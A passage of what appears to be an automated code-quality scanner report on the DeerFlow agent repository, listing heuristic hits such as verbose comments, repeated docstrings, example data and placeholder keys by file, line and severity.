LOW…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json53 "content": "# Tips For Technical Startup Founders | Startup School\n\n# Tips For Technical Startup Founders | St
MEDIUM…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json53 "content": "# Tips For Technical Startup Founders | Startup School\n\n# Tips For Technical Startup Founders | St
MEDIUM…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json225 "content": "[\n {\n \"title\": \"Diana Hu - Partner at Y Combinator | LinkedIn\",\n \"url\": \"https://ww
MEDIUM…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json1173 "content": "I've thoroughly analyzed Diana Hu's Y Combinator talk and conducted deep research on her background
MEDIUM…reads/b83fbb2a-4e36-4d82-9de0-7b2a02c2092a/thread.json53 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
LOW…reads/b83fbb2a-4e36-4d82-9de0-7b2a02c2092a/thread.json64 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
MEDIUM…reads/f4125791-0128-402a-8ca9-50e0947557e4/thread.json52 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json313 "content": "# 🦌 DeerFlow\n\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.py
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json313 "content": "# 🦌 DeerFlow\n\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.py
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json313 "content": "# 🦌 DeerFlow\n\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.py
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json313 "content": "# 🦌 DeerFlow\n\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.py
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1406 "content": "# DeerFlow Deep Research Report\n\n- **Research Date:** 2026-02-01\n- **Timestamp:** 2026-02-0
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1406 "content": "# DeerFlow Deep Research Report\n\n- **Research Date:** 2026-02-01\n- **Timestamp:** 2026-02-0
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1406 "content": "# DeerFlow Deep Research Report\n\n- **Research Date:** 2026-02-01\n- **Timestamp:** 2026-02-0
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1406 "content": "# DeerFlow Deep Research Report\n\n- **Research Date:** 2026-02-01\n- **Timestamp:** 2026-02-0
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1406 "content": "# DeerFlow Deep Research Report\n\n- **Research Date:** 2026-02-01\n- **Timestamp:** 2026-02-0
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1667 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1667 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1667 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1667 "content": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"vi
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json46 "content": "---\nname: github-deep-research\ndescription: Conduct multi-round deep research on any GitHub Repo.
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json694 "content": "[\n {\n \"title\": \"fanqingsong/deer-flow - GitHub\",\n \"url\": \"https://github.com/fanqin
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json694 "content": "[\n {\n \"title\": \"fanqingsong/deer-flow - GitHub\",\n \"url\": \"https://github.com/fanqin
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json732 "content": "# DeerFlow: A Game-Changer for Automated Research and Content Creation | by heavendai | Medium\n\n[S
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json732 "content": "# DeerFlow: A Game-Changer for Automated Research and Content Creation | by heavendai | Medium\n\n[S
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json883 "content": "# 🦌 DeerFlow\n\n# Deep Researchat Your Fingertipsat Your Fingertips\n\nMeet DeerFlow, your personal
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1637 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
MEDIUM…reads/5aa47db1-d0cb-4eb9-aea5-3dac1b371c5a/thread.json204 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
LOW…reads/7f9dc56c-e49c-4671-a3d2-c492ff4dce0c/thread.json54 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/90040b36-7eba-4b97-ba89-02c3ad47a8b9/thread.json54 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/21cfea46-34bd-4aa6-9e1f-3009452fbeb9/thread.json186 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
MEDIUM…reads/c02bb4d5-4202-490e-ae8f-ff4864fc0d2e/thread.json52 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
LOWbackend/app/channels/manager.py764 # Channels that do not support file download will simply return the original message.
MEDIUMbackend/tests/test_setup_agent_http_e2e_real_server.py314 # poll to be robust against scheduler jitter.
MEDIUMscripts/serve.sh293 # `--all-packages` propagates extras into workspace members (deerflow-harness
Verbosity Indicators44 hits · 65 pts
SeverityFileLineSnippet
LOW…reads/4f3e55ee-f853-43db-bfb3-7d1a411f03cb/thread.json168 "content": "---\nname: video-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/4f3e55ee-f853-43db-bfb3-7d1a411f03cb/thread.json365 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/b83fbb2a-4e36-4d82-9de0-7b2a02c2092a/thread.json64 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/7f9dc56c-e49c-4671-a3d2-c492ff4dce0c/thread.json54 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/90040b36-7eba-4b97-ba89-02c3ad47a8b9/thread.json54 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOW…reads/21cfea46-34bd-4aa6-9e1f-3009452fbeb9/thread.json186 "content": "---\nname: image-generation\ndescription: Use this skill when the user requests to generate, create,
LOWbackend/tests/test_deferred_tool_registry_promotion.py167 # Step 1: first call — both MCP tools start deferred
LOWbackend/tests/test_deferred_tool_registry_promotion.py173 # Step 2: simulate tool_search promoting one of them
LOWbackend/tests/test_deferred_tool_registry_promotion.py177 # Step 3: second call — registry must NOT silently undo the promotion
LOWbackend/tests/test_sandbox_orphan_reconciliation_e2e.py82 # Step 1: Start a container (simulating previous process lifecycle)
LOWbackend/tests/test_sandbox_orphan_reconciliation_e2e.py94 # Step 2: Create backend and list running containers
LOWbackend/tests/test_sandbox_orphan_reconciliation_e2e.py105 # Step 3: list_running should find our container
LOWbackend/tests/test_sandbox_orphan_reconciliation_e2e.py110 # Step 4: Simulate reconciliation — this container's created_at is recent,
LOWbackend/tests/test_client_e2e.py166# Step 2: Basic streaming (requires LLM)
LOWbackend/tests/test_client_e2e.py227# Step 3: Tool call flow (requires LLM)
LOWbackend/tests/test_client_e2e.py263# Step 4: File upload integration (no LLM needed for most)
LOWbackend/tests/test_client_e2e.py347# Step 5: Lifecycle and configuration (no LLM needed)
LOWbackend/tests/test_client_e2e.py404# Step 6: Middleware chain verification (requires LLM)
LOWbackend/tests/test_client_e2e.py442# Step 7: Error and boundary conditions
LOWbackend/tests/test_client_e2e.py487# Step 8: Artifact access (no LLM needed)
LOWbackend/tests/test_client_e2e.py542# Step 9: Skill installation (no LLM needed)
LOWbackend/tests/test_client_e2e.py634# Step 10: Configuration management (no LLM needed)
LOWbackend/tests/test_client_e2e.py768# Step 11: Memory access (no LLM needed)
LOWbackend/tests/test_llm_error_handling_middleware.py151 # Step 1: Manually set state to half_open and check_circuit() to set probe_in_flight=True
LOWbackend/tests/test_llm_error_handling_middleware.py158 # Step 2: Now trigger handler that raises GraphBubbleUp
LOWbackend/tests/test_llm_error_handling_middleware.py179 # Step 1: Manually set state to half_open and check_circuit() to set probe_in_flight=True
LOWbackend/tests/test_llm_error_handling_middleware.py186 # Step 2: Now trigger handler that raises GraphBubbleUp
LOWbackend/tests/test_client.py1796 # Step 2: List
LOWbackend/tests/test_client.py1801 # Step 3: Delete one
LOWbackend/tests/test_client.py1805 # Step 4: Verify deletion
LOWbackend/tests/test_client.py1784 # Step 1: Upload
LOWbackend/tests/test_client.py2148 # Step 1: Install
LOWbackend/tests/test_client.py2156 # Step 2: List and find it
LOWbackend/tests/test_client.py2168 # Step 3: Disable it
LOWbackend/tests/test_mcp_config_secrets.py289 # Step 1: Server returns masked config (simulates GET response)
LOWbackend/tests/test_mcp_config_secrets.py294 # Step 2: Frontend toggles enabled and sends back (simulates PUT request)
LOWbackend/tests/test_mcp_config_secrets.py297 # Step 3: Server merges with existing secrets (simulates PUT handler)
LOWbackend/packages/harness/deerflow/subagents/registry.py65 # Step 1: Look up built-in, then fall back to custom_agents
LOWbackend/packages/harness/deerflow/subagents/registry.py72 # Step 2: Apply per-agent overrides from config.yaml agents section.
LOW…arness/deerflow/community/aio_sandbox/local_backend.py376 # Step 1: enumerate container names via docker ps
LOW…arness/deerflow/community/aio_sandbox/local_backend.py411 # Step 2: batched docker inspect — single subprocess call for all containers
LOWskills/public/find-skills/scripts/install-skill.sh49# Step 1: Install the skill using npx
LOWskills/public/find-skills/scripts/install-skill.sh52# Step 2: Verify installation
LOWskills/public/find-skills/scripts/install-skill.sh58# Step 3: Create symlink
Self-Referential Comments20 hits · 61 pts
SeverityFileLineSnippet
MEDIUM…reads/ad76c455-5bf9-4335-8517-fc03834ab828/thread.json202 "content": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sn
MEDIUMbackend/app/gateway/auth/credential_file.py38 f"# DeerFlow admin {label} credentials\n# This file is generated on first boot or password reset.\n# Change the
MEDIUMbackend/app/channels/manager.py961 # Create a new thread through Gateway
MEDIUMbackend/tests/test_client_e2e.py502 # Create an output file in the thread's outputs directory
MEDIUMbackend/tests/test_channel_file_attachments.py108 # Create the directory structure: threads/{thread_id}/user-data/outputs/
MEDIUMbackend/tests/test_run_manager.py759 # Create a run and let it complete (will be in both memory and store)
MEDIUMbackend/tests/test_custom_agent.py295 # Create the agents dir with a file (not a dir)
MEDIUMbackend/tests/test_client.py1462 # Create a source file
MEDIUMbackend/tests/test_client.py2528 # Create a small archive that claims huge uncompressed size.
MEDIUMbackend/tests/test_client.py2957 # Create a target file outside uploads dir.
MEDIUMbackend/tests/test_client.py2961 # Create a symlink inside uploads dir pointing to outside file.
MEDIUMbackend/tests/test_client.py1296 # Create a valid .skill archive
MEDIUMbackend/packages/harness/deerflow/subagents/executor.py463 # Create a new result for synchronous execution
MEDIUMbackend/packages/harness/deerflow/subagents/executor.py712 # Create a result with error if we don't have one
MEDIUM…s/deerflow/agents/middlewares/view_image_middleware.py179 # Create the image details message with text and image content
MEDIUM…s/deerflow/agents/middlewares/view_image_middleware.py182 # Create a new human message with mixed content (text + images)
MEDIUM…eerflow/agents/middlewares/clarification_middleware.py139 # Create a ToolMessage with the formatted question
MEDIUMbackend/packages/harness/deerflow/mcp/tools.py202 # Create the multi-server MCP client
MEDIUMbackend/packages/harness/deerflow/sandbox/tools.py1240 # Create the three directories
MEDIUMscripts/deploy.sh102 # Create a minimal empty config so the gateway doesn't fail on startup
Over-Commented Block73 hits · 46 pts
SeverityFileLineSnippet
LOWconfig.example.yaml1# Configuration for the DeerFlow application
LOWconfig.example.yaml21# Logging
LOWconfig.example.yaml41 # Example: Volcengine (Doubao) model
LOWconfig.example.yaml61
LOWconfig.example.yaml81 # max_retries: 2
LOWconfig.example.yaml101 # num_predict: 8192
LOWconfig.example.yaml121 # Example: Anthropic Claude model (with extended thinking)
LOWconfig.example.yaml141 # thinking:
LOWconfig.example.yaml161 # display_name: Gemini 2.5 Pro (Thinking)
LOWconfig.example.yaml181 # MiMo thinking mode returns reasoning_content and requires that field to be
LOWconfig.example.yaml201 # supports_thinking: true
LOWconfig.example.yaml221 # supports_thinking: true
LOWconfig.example.yaml241 # max_tokens: 32768
LOWconfig.example.yaml261 # base_url: https://api.novita.ai/openai
LOWconfig.example.yaml281 # display_name: MiniMax M2.5
LOWconfig.example.yaml301 # max_tokens: 4096
LOWconfig.example.yaml321
LOWconfig.example.yaml341 # api_key: $OPENAI_API_KEY
LOWconfig.example.yaml361 # max_retries: 2
LOWconfig.example.yaml381 # supports_vision: false
LOWconfig.example.yaml401
LOWconfig.example.yaml421 # max_results: 5
LOWconfig.example.yaml441 # use: deerflow.community.exa.tools:web_search_tool
LOWconfig.example.yaml461
LOWconfig.example.yaml481 # group: web
LOWconfig.example.yaml541# This reduces context usage and improves tool selection accuracy when
LOWconfig.example.yaml581loop_detection:
LOWconfig.example.yaml601# Intercept AIMessages where the provider stopped generation for safety reasons
LOWconfig.example.yaml621 # - use: deerflow.agents.middlewares.safety_termination_detectors:OpenAICompatibleContentFilterDetector
LOWconfig.example.yaml641 # Application-level upload limits enforced by the gateway and exposed to the
LOWconfig.example.yaml661 use: deerflow.sandbox.local:LocalSandboxProvider
LOWconfig.example.yaml681# Option 2: Container-based AIO Sandbox
LOWconfig.example.yaml701#
LOWconfig.example.yaml721# # API_KEY: $MY_API_KEY # Reads from host's MY_API_KEY env var
LOWconfig.example.yaml741# # max_turns: 120
LOWconfig.example.yaml761# # analysis:
LOWconfig.example.yaml781# # The model name must match a name defined in the `models:` section above.
LOWconfig.example.yaml801# # DeerFlow expects an ACP adapter here. The standard `codex` CLI does not
LOWconfig.example.yaml821 # path: /absolute/path/to/custom/skills
LOWconfig.example.yaml861 trigger:
LOWconfig.example.yaml881 # Alternative: Keep percentage of model's max input tokens
LOWconfig.example.yaml921# ============================================================================
LOWconfig.example.yaml941# Prefer the unified `database` section below, which drives BOTH the
LOWconfig.example.yaml961#
LOWconfig.example.yaml981# UV_EXTRAS=postgres
LOWconfig.example.yaml1001#
LOWconfig.example.yaml1021# track_token_usage: true # Accumulate token counts to RunRow
LOWconfig.example.yaml1041# #
LOWconfig.example.yaml1061# app_id: $FEISHU_APP_ID
LOWconfig.example.yaml1081# # Optional: allow first-time QR bootstrap when bot_token is absent
LOWconfig.example.yaml1101# max_inbound_file_bytes: 52428800
LOWconfig.example.yaml1121# subagent_enabled: true
LOWconfig.example.yaml1141
LOWconfig.example.yaml1161# The Open Agent Passport (OAP) spec defines passport format and decision codes.
LOWconfig.example.yaml1181# When the failure threshold is reached, subsequent calls fast-fail until recovery.
LOWdocker/docker-compose.yaml1# DeerFlow Production Environment
LOWdocker/docker-compose-dev.yaml1# DeerFlow Development Environment
LOWdocker/dev-entrypoint.sh1#!/usr/bin/env sh
LOWbackend/tests/conftest.py21# Break the circular import chain that exists in production code:
LOWbackend/tests/test_title_generation.py81 # def test_after_agent_hook(self):
13 more matches not shown…
Cross-File Repetition9 hits · 45 pts
SeverityFileLineSnippet
HIGH…packages/harness/deerflow/community/firecrawl/tools.py0search the web. args: query: the query to search for.
HIGH…ckend/packages/harness/deerflow/community/exa/tools.py0search the web. args: query: the query to search for.
HIGH…nd/packages/harness/deerflow/community/tavily/tools.py0search the web. args: query: the query to search for.
HIGH…packages/harness/deerflow/community/infoquest/tools.py0search the web. args: query: the query to search for.
HIGH…packages/harness/deerflow/community/firecrawl/tools.py0fetch the contents of a web page at a given url. only fetch exact urls that have been provided directly by the user or h
HIGH…ckend/packages/harness/deerflow/community/exa/tools.py0fetch the contents of a web page at a given url. only fetch exact urls that have been provided directly by the user or h
HIGH…d/packages/harness/deerflow/community/jina_ai/tools.py0fetch the contents of a web page at a given url. only fetch exact urls that have been provided directly by the user or h
HIGH…nd/packages/harness/deerflow/community/tavily/tools.py0fetch the contents of a web page at a given url. only fetch exact urls that have been provided directly by the user or h
HIGH…packages/harness/deerflow/community/infoquest/tools.py0fetch the contents of a web page at a given url. only fetch exact urls that have been provided directly by the user or h
Redundant / Tautological Comments25 hits · 41 pts
SeverityFileLineSnippet
LOW…reads/ad76c455-5bf9-4335-8517-fc03834ab828/thread.json123 "content": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sn
LOWbackend/app/gateway/routers/artifacts.py138 # Check if this is a request for a file inside a .skill archive (e.g., xxx.skill/SKILL.md)
LOWbackend/app/channels/discord.py334 # Check if there's an active thread for this channel
LOWbackend/tests/test_infoquest_client.py99 # Check if result is a valid JSON string with expected content
LOWbackend/tests/test_infoquest_client.py278 # Check if result is a valid JSON string with expected content
LOWbackend/tests/test_infoquest_client.py326 # Check if result is a valid JSON string
LOW…/packages/harness/deerflow/tools/builtins/task_tool.py365 # Check if task completed, failed, or timed out
LOWbackend/packages/harness/deerflow/subagents/executor.py534 # Check if this is a new AI message
LOW…s/deerflow/agents/middlewares/view_image_middleware.py91 # Check if all tool calls have been completed
LOW…s/deerflow/agents/middlewares/view_image_middleware.py147 # Check if it has view_image tool calls
LOW…s/deerflow/agents/middlewares/view_image_middleware.py151 # Check if all tools have been completed
LOW…s/deerflow/agents/middlewares/view_image_middleware.py155 # Check if we've already added an image details message
LOW…arness/deerflow/agents/middlewares/title_middleware.py75 # Check if thread already has a title in state
LOW…arness/deerflow/agents/middlewares/title_middleware.py79 # Check if this is the first turn (has at least one user message and one assistant response)
LOW…eerflow/agents/middlewares/clarification_middleware.py173 # Check if this is an ask_clarification tool call
LOW…eerflow/agents/middlewares/clarification_middleware.py195 # Check if this is an ask_clarification tool call
LOWbackend/packages/harness/deerflow/mcp/cache.py97 # Check if cache is stale due to config file changes
LOWbackend/packages/harness/deerflow/sandbox/tools.py330 # Check if args has server-filesystem package
LOWbackend/packages/harness/deerflow/sandbox/tools.py1118 # Check if sandbox already exists in state
LOWbackend/packages/harness/deerflow/sandbox/tools.py1236 # Check if directories have already been created
LOW…rness/deerflow/community/infoquest/infoquest_client.py68 # Check if status code is not 200
LOWscripts/detect_uv_extras.py194 # Check if we're at the parent's child level (subsection)
LOWskills/public/skill-creator/scripts/init_skill.py208 # Check if directory already exists
LOWskills/public/vercel-deploy-claimable/scripts/deploy.sh175# Check if input is a .tgz file or a directory
LOWskills/public/vercel-deploy-claimable/scripts/deploy.sh191 # Check if this is a static HTML project (no package.json)
Synthetic Comment Markers7 hits · 35 pts
SeverityFileLineSnippet
HIGH…reads/7cfa5f8f-a2f8-47ad-acbd-da7137baf990/thread.json550 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
HIGH…reads/b83fbb2a-4e36-4d82-9de0-7b2a02c2092a/thread.json53 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
HIGH…reads/f4125791-0128-402a-8ca9-50e0947557e4/thread.json52 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
HIGH…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json1637 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
HIGH…reads/5aa47db1-d0cb-4eb9-aea5-3dac1b371c5a/thread.json204 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
HIGH…reads/7f9dc56c-e49c-4671-a3d2-c492ff4dce0c/thread.json847 "content": "# The Leica Master's Eye: Capturing the Decisive Moment in the Age of AI\n\n*By DeerFlow 2.0 |
HIGH…reads/c02bb4d5-4202-490e-ae8f-ff4864fc0d2e/thread.json52 "content": "---\nname: frontend-design\ndescription: Create distinctive, production-grade frontend interfaces wi
Fake / Example Data9 hits · 11 pts
SeverityFileLineSnippet
LOWbackend/tests/test_auth.py303 user = User(email="admin@example.com", password_hash="hash", needs_setup=True)
LOWbackend/tests/test_auth_middleware.py102 return {"id": "1", "email": "test@test.com"}
LOWbackend/tests/test_initialize_admin.py61 "email": "admin@example.com",
LOWbackend/tests/test_initialize_admin.py75 assert data["email"] == "admin@example.com"
LOWbackend/docs/AUTH_TEST_PLAN.md90 -d '{"email":"admin@example.com","password":"AdminPass1!"}' \
LOWbackend/docs/AUTH_TEST_PLAN.md96- Body: `{"id": "...", "email": "admin@example.com", "system_role": "admin", "needs_setup": false}`
LOWbackend/docs/AUTH_TEST_PLAN.md105**预期:** `{"id": "...", "email": "admin@example.com", "system_role": "admin", "needs_setup": false}`
LOWbackend/docs/AUTH_TEST_PLAN.md688 -d '{"email":"admin@example.com","password":"AdminPass1!"}' \
LOWbackend/docs/AUTH_TEST_PLAN.md1541 -d '{"email":"admin@example.com","password":"AdminPass1!"}' \
Magic Placeholder Names2 hits · 10 pts
SeverityFileLineSnippet
HIGHbackend/README.md183export OPENAI_API_KEY="your-api-key-here"
HIGHbackend/CONTRIBUTING.md52export OPENAI_API_KEY="your-api-key"
Hallucination Indicators1 hit · 10 pts
SeverityFileLineSnippet
CRITICALbackend/app/channels/feishu.py317 return self._api_client.im.v1.message_resource.get(request)
Slop Phrases2 hits · 4 pts
SeverityFileLineSnippet
LOW…reads/d3e5adaf-084c-4dd5-9d29-94f1d6bccd98/thread.json53 "content": "# Tips For Technical Startup Founders | Startup School\n\n# Tips For Technical Startup Founders | St
MEDIUM…reads/fe3f7974-1bcb-4a01-a950-79673baafefd/thread.json313 "content": "# 🦌 DeerFlow\n\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.py
Example Usage Blocks3 hits · 4 pts
SeverityFileLineSnippet
LOWscripts/serve.sh5# Usage:
LOWskills/public/claude-to-deerflow/scripts/chat.sh4# Usage:
LOWskills/public/claude-to-deerflow/scripts/status.sh4# Usage:
Dead Code2 hits · 3 pts
SeverityFileLineSnippet
MEDIUMbackend/tests/test_worker_langfuse_metadata.py35
MEDIUMbackend/tests/test_channels.py1101
Overly Generic Function Names2 hits · 2 pts
SeverityFileLineSnippet
LOWbackend/tests/test_subagent_executor.py1146 def execute_task(task_id: int):
LOWbackend/packages/harness/deerflow/subagents/executor.py753 def run_task():